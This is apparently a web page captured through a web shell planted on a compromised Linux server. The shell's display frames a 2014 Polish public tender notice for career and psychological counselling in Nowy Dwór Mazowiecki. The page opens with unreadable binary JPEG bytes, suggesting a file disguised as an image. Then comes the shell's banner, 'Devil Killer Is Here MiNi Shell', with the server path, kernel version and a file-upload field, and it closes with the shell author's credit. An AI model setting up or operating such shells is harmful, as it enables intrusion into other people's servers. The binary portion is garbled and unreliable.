JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140228/68248-N-2014.html

<p class="kh_header"><b>Nowy Dwór Mazowiecki: Zorganizowanie i przeprowadzenie doradztwa zawodowego oraz psychologicznego dla uczestników projektu pn Czas na aktywność współfiansowanego przez Unię Europejską w ramach Europejskigo Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 68248 - 2014; data zamieszczenia: 28.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Paderewskiego 6, 05-100 Nowy Dwór Mazowiecki, woj. mazowieckie, tel. 22 765 94 90, faks 22 765 94 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcprndm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie doradztwa zawodowego oraz psychologicznego dla uczestników projektu pn Czas na aktywność współfiansowanego przez Unię Europejską w ramach Europejskigo Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zostało podzielone na dwie części: 

Zadanie 1 - Doradztwo zawodowe 

1.W ramach tej części Wykonawca będzie zobowiązany do: 
1)Przeprowadzenia cyklu indywidualnych spotkań z doradcą zawodowym                                dla ok. 68 uczestników projektu w wymiarze 311 h zegarowych w tym: 70h zegarowych na grupę kontującą naukę (przewidywana ilość osób: 14), 100 h zegarowych  na grupę osób niepełnosprawnych (przewidywana ilość osób: 20), 80h zegarowe na grupę osób z problemami opiekuńczo - wychowawczymi (przewidywana ilość osób: 20), 21h zegarowe na grupę sprawcy przemocy w rodzinie  (przewidywana ilość osób: 4), 40h zegarowe na grupę osób w wieku 15-17 lat z rodzin zastępczych i placówek opiekuńczo-wychowawczych (przewidywana ilość osób 10). 
2)Określenia indywidualnej ścieżki kariery zawodowej dla ok. 68 uczestników projektu, dostosowanie wsparcia doradcy zawodowego do indywidualnych, zdiagnozowanych potrzeb uczestnika. Konsultacje indywidualne z doradcą zawodowym mają na celu określenie ścieżki reintegracji, diagnozę możliwości zawodowych uczestników projektu poprzez rozpoznanie obszarów trudności, rozpoznanie potencjału zawodowego, zainteresowań przydatnych w wyborze kariery zawodowej, kwalifikacji zawodowych wymaganych na konkretne stanowiska pracy. Opracowanie indywidualnego planu działania, indywidualnej ścieżki kariery analiza potrzeb uczestnika. Tematyka powinna być dostosowana do indywidualnych potrzeb uczestników, ich oczekiwań, poziomu wiedzy i umiejętności.
3)Przygotowania harmonogramu spotkań z doradcą zawodowym mając na względzie dni od poniedziałku do piątku w godz. 09-20 , soboty - niedziele w godz. 09-19. Przekazania Zamawiającemu harmonogramu spotkań najpóźniej na 7 dni roboczych przed pierwszym spotkaniem. Zamawiający przewiduje możliwość zmiany harmonogramu w uzasadnionych przypadkach. 
4)Umawiania uczestników na spotkania z doradcą zawodowym. Zamawiający przekaże Wykonawcy listę kontaktów teleadresowych uczestników. Informowania Zamawiającego  o nieobecności uczestników podczas spotkania bądź wszelkich trudności związanych  z nawiązaniem kontaktu z uczestnikami.
5)Zapewnienia na terenie miasta Nowy Dwór Mazowiecki woj. mazowieckie odpowiednio wyposażonej sali w budynku pozbawionym barier architektonicznych. Pomieszczenie musi być wyposażone w odpowiedni sprzęt multimedialny, stolik, krzesła. 
6)Zapewnienia podczas spotkań cateringu tj. kawa, herbata, cukier, śmietanka, woda gaz,niegaz., soki, ciastka, owoce
7)Zapewnienia niezbędnych materiałów dla każdego uczestnika do przeprowadzenia spotkań  z doradcą zawodowym tj. długopis, skoroszyt, skrypty, testy, ankiety itp. 
8)Prowadzenia dokumentacji z przebiegu spotkań z doradcą zawodowym tj. imienne listy obecności uczestników, listy odbioru materiałów dydaktycznych oraz cateringu indywidualne plany działania, indywidualne ścieżki kariery zawodowej, testy, ankiety ewaluacyjne na początku i na końcu spotkań. Przekazania Zamawiającemu oryginałów lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę ww dokumentacji  po zakończeniu realizacji usługi. 
9)Przestrzegania wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
10)Zapewnić uczestnikowi warunki spotkań  w oparciu o zasady BHP
11)Podpisania umowy o przetwarzaniu danych osobowych uczestników

Zadanie 2 Doradztwo psychologiczne 

1.W ramach tej części Wykonawca będzie zobowiązany do: 
1) Przeprowadzenia cyklu indywidualnych spotkań z psychologiem dla ok. 68 uczestników projektu  w wymiarze 311 h zegarowych w tym: 70h zegarowych  na grupę kontującą naukę (przewidywana ilość osób: 14), 100 h zegarowych  na grupę osób niepełnosprawnych (przewidywana ilość osób: 20), 80h zegarowe na grupę osób z problemami opiekuńczo - wychowawczymi (przewidywana ilość osób: 20), 21h zegarowe na grupę sprawcy przemocy w rodzinie  (przewidywana ilość osób: 4), 40h zegarowe na grupę osób w wieku 15-17 lat z rodzin zastępczych i placówek opiekuńczo-wychowawczych (przewidywana ilość osób 10). 
2 Dostosowania wsparcia psychologicznego do indywidualnych potrzeb uczestników projektu. Należy uwzględnić w tematyce wsparcia psychologicznego elementy relacji interpersonalnych, budowania obrazu własnej osoby, umiejętności rozwiązywania problemów. Indywidualne konsultacje z psychologiem mają na celu wsparcie uczestników w rozwiązywaniu problemów w związku z aktualną sytuacją życiową, społeczną, zawodową.
3)Przygotowania harmonogramu spotkań z psychologiem mając na względzie                             dni od poniedziałku do piątku w godz. 09-20 , soboty - niedziele w godz. 09-19. Przekazania Zamawiającemu harmonogramu spotkań najpóźniej na 7 dni roboczych przed pierwszym spotkaniem. Zamawiający przewiduje możliwość zmiany harmonogramu w uzasadnionych przypadkach.
4)Umawiania uczestników na spotkania z psychologiem. Zamawiający przekaże Wykonawcy listę kontaktów uczestników. Informowania Zamawiającego o nieobecności uczestników podczas spotkania bądź wszelkich trudności związanych z nawiązaniem kontaktu z uczestnikami.
5)Zapewnienia na terenie miasta Nowy Dwór Mazowiecki woj. mazowieckie odpowiednio wyposażonej sali w budynku pozbawionym barier architektonicznych. Pomieszczenie musi być wyposażone w odpowiedni sprzęt multimedialny, stolik, krzesła. 
6)Zapewnienia podczas spotkań cateringu tj. kawa, herbata, cukier, śmietanka, woda gaz,niegaz., soki, ciastka, owoce.
7)Zapewnienia niezbędnych materiałów dla każdego uczestnika do przeprowadzenia spotkań  z psychologiem tj. długopis, skoroszyt, skrypty, testy itp. 
8)Prowadzenia dokumentacji z przebiegu spotkań z psychologiem tj. imienne listy obecności uczestników, listy odbioru materiałów dydaktycznych oraz cateringu, testy, ankiety ewaluacyjne na początku i na końcu spotkań. Przekazania Zamawiającemu oryginałów lub kopii poświadczonej za zgodność  z oryginałem przez Wykonawcę ww dokumentacji po zakończeniu realizacji usługi. 
9)Przestrzegania wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
10)Zapewnić uczestnikowi warunki spotkań w oparciu o zasady BHP
11)Podpisania umowy o przetwarzaniu danych osobowych uczestników..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 85.12.12.70-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony przez złożenie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
- wykonał, co najmniej 4 usługi w zakresie doradztwa zawodowego, składając ofertę na doradztwo zawodowe
- wykonał, co najmniej 4 usługi w zakresie doradztwa psychologicznego, składając ofertę na doradztwo psychologiczne</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony przez złożenie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy Zadania 1 zamówienia osoba przewidziana do realizacji zamówienia posiada wykształcenie wyższe uzyskane w polskiej uczelni lub uzyskane za granicą wykształcenie uznane za równorzędne w Rzeczypospolitej Polskiej w zakresie /o specjalności doradca zawodowy bądź wykształcenie wyższe i studia podyplomowe w zakresie doradca zawodowy oraz co najmniej         2-letni okres pracy w tym zawodzie lub co najmniej dwuletni okres udzielania porad w zakresie doradztwa zawodowego;
- Dotyczy zadania 2 zamówienia - osoba przewidziana do realizacji zamówienia musi posiadać dyplom magistra psychologii uzyskany w polskiej uczelni lub uzyskane za granicą wykształcenie uznane za równorzędne w Rzeczypospolitej Polskiej oraz co najmniej 2-letni okres wykonywania zawodu psychologa lub co najmniej dwuletni okres udzielania porad psychologicznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony przez złożenie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 55</li>
<li>2 - Doświadczenie - 45</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)zmiany terminu realizacji usługi; 
2)zmiany danych adresowych, osobowych Zamawiającego lub Wykonawcy; 
3)zaistnienie siły wyższej mającej wpływ na realizację umowy 
4)zmiana umowy nastąpi również w przypadku zmiany przepisów prawa powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiot zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprndm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Paderewskiego 6, 05-100 Nowy Dwór Mazowiecki, pokój 304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2014 godzina 09:00, miejsce: ul. Paderewskiego 6, 05-100 Nowy Dwór Mazowiecki, pokój 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn Czas na aktywność współfiansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Doradztwo zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	W ramach tej części Wykonawca będzie zobowiązany do: 
1)	Przeprowadzenia cyklu indywidualnych spotkań z doradcą zawodowym                                dla ok. 68 uczestników projektu w wymiarze 311 h zegarowych w tym: 70h zegarowych na grupę kontującą naukę (przewidywana ilość osób: 14), 100 h zegarowych  na grupę osób niepełnosprawnych (przewidywana ilość osób: 20), 80h zegarowe na grupę osób z problemami opiekuńczo - wychowawczymi (przewidywana ilość osób: 20), 21h zegarowe na grupę sprawcy przemocy w rodzinie  (przewidywana ilość osób: 4), 40h zegarowe na grupę osób w wieku 15-17 lat z rodzin zastępczych i placówek opiekuńczo-wychowawczych (przewidywana ilość osób 10). 
2)	Określenia indywidualnej ścieżki kariery zawodowej dla ok. 68 uczestników projektu, dostosowanie wsparcia doradcy zawodowego do indywidualnych, zdiagnozowanych potrzeb uczestnika. Konsultacje indywidualne z doradcą zawodowym mają na celu określenie ścieżki reintegracji, diagnozę możliwości zawodowych uczestników projektu poprzez rozpoznanie obszarów trudności, rozpoznanie potencjału zawodowego, zainteresowań przydatnych w wyborze kariery zawodowej, kwalifikacji zawodowych wymaganych na konkretne stanowiska pracy. Opracowanie indywidualnego planu działania, indywidualnej ścieżki kariery analiza potrzeb uczestnika. Tematyka powinna być dostosowana do indywidualnych potrzeb uczestników, ich oczekiwań, poziomu wiedzy i umiejętności.
3)	Przygotowania harmonogramu spotkań z doradcą zawodowym mając na względzie dni      od poniedziałku do piątku w godz. 09-20 , soboty - niedziele w godz. 09-19. Przekazania Zamawiającemu harmonogramu spotkań najpóźniej na 7 dni roboczych przed pierwszym spotkaniem. Zamawiający przewiduje możliwość zmiany harmonogramu w uzasadnionych przypadkach. 
4)	Umawiania uczestników na spotkania z doradcą zawodowym. Zamawiający przekaże Wykonawcy listę kontaktów teleadresowych uczestników. Informowania Zamawiającego  o nieobecności uczestników podczas spotkania bądź wszelkich trudności związanych z nawiązaniem kontaktu z uczestnikami.
5)	Zapewnienia na terenie miasta Nowy Dwór Mazowiecki woj. mazowieckie odpowiednio wyposażonej sali w budynku pozbawionym barier architektonicznych. Pomieszczenie musi być wyposażone w odpowiedni sprzęt multimedialny, stolik, krzesła. 
6)	Zapewnienia podczas spotkań cateringu tj. kawa, herbata, cukier, śmietanka, woda gaz/niegaz., soki, ciastka, owoce
7)	Zapewnienia niezbędnych materiałów dla każdego uczestnika do przeprowadzenia spotkań  z doradcą zawodowym tj. długopis, skoroszyt, skrypty, testy, ankiety itp. 
8)	Prowadzenia dokumentacji z przebiegu spotkań z doradcą zawodowym tj. imienne listy obecności uczestników, listy odbioru materiałów dydaktycznych oraz cateringu indywidualne plany działania, indywidualne ścieżki kariery zawodowej, testy, ankiety ewaluacyjne na początku i na końcu spotkań. Przekazania Zamawiającemu oryginałów lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę w/w dokumentacji  po zakończeniu realizacji usługi. 
9)	Przestrzegania wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 

10)	Zapewnić uczestnikowi warunki spotkań  w oparciu o zasady BHP

11)	 Podpisania umowy o przetwarzaniu danych osobowych uczestników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 55</li>
<li>2. Doświadczenie - 45</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doradztwo psychologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.W ramach tej części Wykonawca będzie zobowiązany do: 
1) Przeprowadzenia cyklu indywidualnych spotkań z psychologiem dla ok. 68 uczestników projektu  w wymiarze 311 h zegarowych w tym: 70h zegarowych  na grupę kontującą naukę (przewidywana ilość osób: 14), 100 h zegarowych  na grupę osób niepełnosprawnych (przewidywana ilość osób: 20), 80h zegarowe na grupę osób z problemami opiekuńczo - wychowawczymi (przewidywana ilość osób: 20), 21h zegarowe na grupę sprawcy przemocy w rodzinie  (przewidywana ilość osób: 4), 40h zegarowe na grupę osób w wieku 15-17 lat z rodzin zastępczych i placówek opiekuńczo-wychowawczych (przewidywana ilość osób 10). 
2)	Dostosowania wsparcia psychologicznego do indywidualnych potrzeb uczestników projektu. Należy uwzględnić w tematyce wsparcia psychologicznego elementy relacji interpersonalnych, budowania obrazu własnej osoby, umiejętności rozwiązywania problemów. Indywidualne konsultacje z psychologiem mają na celu wsparcie uczestników w rozwiązywaniu problemów w związku z aktualną sytuacją życiową, społeczną, zawodową.
3)	Przygotowania harmonogramu spotkań z psychologiem mając na względzie                             dni od poniedziałku do piątku w godz. 09-20 , soboty - niedziele w godz. 09-19. Przekazania Zamawiającemu harmonogramu spotkań najpóźniej na 7 dni roboczych przed pierwszym spotkaniem. Zamawiający przewiduje możliwość zmiany harmonogramu w uzasadnionych przypadkach.
4)	Umawiania uczestników na spotkania z psychologiem. Zamawiający przekaże Wykonawcy listę kontaktów uczestników. Informowania Zamawiającego o nieobecności uczestników podczas spotkania bądź wszelkich trudności związanych z nawiązaniem kontaktu                      z uczestnikami.
5)	Zapewnienia na terenie miasta Nowy Dwór Mazowiecki woj. mazowieckie odpowiednio wyposażonej sali w budynku pozbawionym barier architektonicznych. Pomieszczenie musi być wyposażone w odpowiedni sprzęt multimedialny, stolik, krzesła. 
6)	Zapewnienia podczas spotkań cateringu tj. kawa, herbata, cukier, śmietanka, woda gaz/niegaz., soki, ciastka, owoce.
7)	Zapewnienia niezbędnych materiałów dla każdego uczestnika do przeprowadzenia spotkań  z psychologiem tj. długopis, skoroszyt, skrypty, testy itp. 
8)	Prowadzenia dokumentacji z przebiegu spotkań z psychologiem tj. imienne listy obecności uczestników, listy odbioru materiałów dydaktycznych oraz cateringu, testy, ankiety ewaluacyjne na początku i na końcu spotkań. Przekazania Zamawiającemu oryginałów lub kopii poświadczonej za zgodność  z oryginałem przez Wykonawcę w/w dokumentacji  po zakończeniu realizacji usługi. 
9)	Przestrzegania wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

10)	Zapewnić uczestnikowi warunki spotkań w oparciu o zasady BHP

11)	 Podpisania umowy o przetwarzaniu danych osobowych uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 55</li>
<li>2. Doświadczenie - 45</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com